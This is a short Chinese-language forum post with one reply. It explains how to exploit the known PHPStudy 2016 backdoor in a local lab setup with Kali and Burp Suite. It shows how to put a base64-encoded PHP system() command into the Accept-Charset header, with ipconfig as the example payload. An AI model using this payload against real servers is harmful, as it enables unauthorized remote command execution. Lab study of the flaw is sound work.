搜索
查看: 2608|回复: 1

浅谈PHPstudy后门利用

    [复制链接]

317

主题

476

帖子

1012

积分

vip用户

Rank: 6Rank: 6

积分
1012

注册会员活跃会员热心会员

QQ
发表于 2020-5-5 20:04:53 | 显示全部楼层 |阅读模式

环境说明:

  • kali Linux
  • phpstudy(2016)
  • php5.4+apache

burp 抓包

访问http://localhost/index.php在burp中抓包 需要注意的是,后面一定要跟xxx.php 999.png

右键 send to sequencer 99999999.png Accept-Charset后跟base64编码的系统命令: 如:

Accept-Charset:system('ipconfig');  #编码前
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==   #编码后

yyyy.png

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有没有参加CTF比赛的,一起组队啊!
回复

使用道具 举报

2

主题

9

帖子

15

积分

新手开车

Rank: 1

积分
15
发表于 2020-5-5 21:38:45 来自手机 | 显示全部楼层
试了好几次都没有成功,过会儿在试一下!e6k
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表